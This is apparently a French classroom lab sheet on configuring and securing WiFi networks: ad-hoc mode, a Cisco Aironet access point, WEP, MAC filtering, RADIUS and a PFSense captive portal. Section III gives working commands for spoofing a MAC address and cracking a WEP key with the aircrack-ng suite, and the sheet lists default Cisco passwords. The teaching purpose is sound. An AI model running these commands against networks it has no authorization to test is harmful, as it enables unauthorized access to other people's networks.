TP sur le WiFi
I- Réseaux Ad-Hoc :
1. Configuration
-
Sous Windows :
- Installez d'abord le driver
- Quand le logiciel vous le demande, branchez la clé USB WiFi
- Créez un réseau sans-fil Ad-Hoc nommé GretaX sans aucune méthode de chiffrement.
- Donnez une adresse IP à votre clé USB dans le réseau 192.168.Y.0/24. Il n'y aura pas de passerelle ni de DNS pour le moment.
2. Vérification
- Vérifiez que vous pouvez communiquer avec les personnes de votre groupe en pingant les adresses des autres machine.
- Essayez de transférer un fichier par un partage Windows et notez le temps mis par ce paquet pour transférer d'un PC à un autre.
3. Premier niveau de sécurité : Chiffrement WEP
- Quel est le nom de l'algorithme de chiffrement et quelle est la méthode utilisée pour les réseaux WEP ?
- Passez votre configuration en chiffrement WEP de 40/64 bits avec comme clé : 1234567890
- Refaites l'étape 2.
4. Amélioration du réseau Ad-hoc :
Comment peut-on améliorer la sécurité d'un réseau Ad-Hoc ?
A quels paramètres doit penser l'administrateur réseau si les performances du réseau ne sont pas satisfaisantes ?
II- Réseaux infrastructure :
1. Point d'accès (première partie)
Pour une première configuration de borne Cisco Aironet 1200, vous avez deux méthodes :
-
Première méthode :
- Brancher un câble console à la borne
- Lancez Putty ou HyperTerminal avec les paramètres par défaut à 9600 bauds.
- Entrez sur la console (mot de passe par défaut : Cisco)
- Dans le mode configuration donnez une IP à l'interface f0 : 192.168.Y.Z
- Enregistrez votre configuration avec copy run start
-
Deuxième méthode :
- Repérer l'@ MAC de la borne
- La brancher au mur ou à un switch avec un serveur DHCP sur le réseau
- Aller sur l'IP qui lui a été donnée (sinon par défaut : 10.0.0.1)
- Login admin, mdp Cisco
2. Station en écoute
- Sur l'interface du côté WLAN :
- Configurez l'adresse : 192.168.Y.254
- Sur l'interface du côté LAN du Greta :
- Configurez l'adresse : 192.168.X.254
- Vérifiez que vous pouvez communiquer avec la borne d'une part, et avec le réseau du Greta et Internet d'autre part.
- Activez le routage sur votre machine
3. Point d'accès (deuxième partie) :
- Depuis la station en écoute, allez avec un navigateur sur l'adresse 192.168.Y.Z
- Dans le menu ...
- Express Security :
- Créez le réseau sans-fil nommé GretaX et faites en sorte que ce nom soit publié par envois de trames Beacon.
- Pas de Vlan d'appartenance
- Réseau ouvert sans chiffrement
- Network Interfaces :
- Activez l'interface Radio0
- Express Security :
4. Configuration des clients
- Configurez vos clients pour qu'ils accèdent au réseau GretaX.
5. Vérification
- Vérifiez que vous pouvez communiquer avec les personnes de votre groupe.
- Essayez de transférer un fichier par un partage Windows et notez le temps mis par ce paquet pour transférer d'un PC à un autre.
- Avec Wireshark, faites une analyse de trames pour voir si les données passent en clair. Que peut-on en conclure ?
6. Clé WEP :
Passez la configuration de la borne Cisco en chiffrement WEP de 40/64 bits avec comme clé : 1234567890 (Menu Express Security).
Intégrez les clients à ce nouveau réseau sécurisé.
7. Référencement des adresses MAC :
Sur la borne, définissez la liste des adresses MAC des clients qui pourront se connecter (Menu Security > Advanced security).
III- Insécurité de la clé WEP :
1. Préparation :
- L'un des ordinateurs connectés au réseau sans fil va démarrer sa machine avec un liveCD de Linux (ex : Debian, Ubuntu, Backtrack, ...) .
- L'utilitaire de sécurité sans-fil s'appelle aircrack-ng (à installer si ce n'est pas déjà fait).
2. Trouver l'adresse MAC et se faire passer pour un client autorisé :
Le spoofing est très simple avec airodump (voir chap. suivant). Quand vous connaissez l'adresse MAC d'un client, il ne vous reste plus qu'à changer la votre :
- Sous Linux : ifconfig
hw ether @mac - Sous Windows avec un logiciel supplémentaire
3. Méthode pour l'attaquant :
Le logiciel aircrack-ng doit être installé (il est déjà intégré dans le CD Backtrack).
La carte WiFi doit être lancée en mode écoute (ma carte s'appelle wlan0) :
airmon-ng start wlan0
On demande à la carte de chercher tous les points d'accès à proximité :
airodump-ng mon0
A partir de ce résultat, nous cherchons la cible à attaquer avec son adresse MAC puis on capture les échanges sur la borne que l'on veut attaquer dans le fichier nommé « capture » :
airodump-ng --write capture --channel <n°> --bssid <@mac borne> mon0
A ce moment, nous allons injecter du trafic avec la commande aireplay. Cette commande est capable d'attaquer de plusieurs façons. Ici nous utilisons l'attaque 3 qui permet de réinjecter des trames ARP.
A ce moment, plus le client connecté à la borne utilise le réseau et plus on a de chances de trouver rapidement la clé WEP.
aireplay-ng -3 -e <nom essid> -a <@ mac borne> -h <@ mac station> wlan0
Enfin, la commande aircrack permet de trouver le mot de passe à partir des fichiers capturés :
aircrack-ng capture*.cap
IV- Améliorations à apporter :
1- Performances :
Est-il possible de choisir le numéro du canal utilisé par la borne Cisco ?
Par défaut, quel canal est utilisé par cette borne ?
Dans le contexte de ce TP, quel(s) canal (canaux) serait-il souhaitable d'utiliser ?
2- Sécurité renforcée ?
Que préconise la norme 802.11i pour la sécurité des réseaux sans-fil, concernant la méthode d'authentification et le chiffrement utilisé pour les réseaux personnels ?
La méthode de chiffrement citée ci-dessus a-t-elle déjà connu des failles de sécurité référencées ?
Que préconise cette norme concernant les réseaux d'entreprises ?
Pouvez-vous mettre en place une sécurité 802.11i personnelle sur la borne Cisco ? Pourquoi ?
Que faut-il pour mettre en place une sécurité 802.11i entreprise ?
V- Serveur d'authentification Radius et chiffrement EAP :
1. Questions :
- Quel est le rôle d'un serveur Radius ?
- Peut-il être remplacé par un serveur d'un autre type ?
- Quels sont les chiffrements possibles associés à Radius ?
- Quelles sont les particularités du protocole EAP ?
- Par quoi peut-il être remplacé ?
2. Mettre en place une authentification Radius :
Voir le TP sur le serveur Radius de Windows 2008 R2 ou 2012.
VI- Portail Captif :
1- Questions :
- Expliquez le principe du portail captif :
- Les données traversant le portail captif sont elles chiffrées ? Pourquoi ?
- Citez un logiciel ou une suite de logiciels permettant de faire un portail captif sous Linux :
2- Portail captif avec PFSense :
- Démarrez le PC Linux avec le live CD PFSense.
- Repérez le nom des interfaces réseau puis configurez au moins l'une d'entre elle.
- Définissez un mot de passe pour l'interface Web.
- Allez en HTTP sur l'interface de PFSense et configurez un accès au portail captif avec authentification locale (on peut également définir une authentification radius).
- Définissez pour chacun des clients un login et un mot de passe.
- Sur vos clients configurez les paramètres IP pour utiliser le réseau WiFi avec comme passerelle PFSense.
- Vérifiez que vous avez bien accès au services réseau en passant par le portail captif.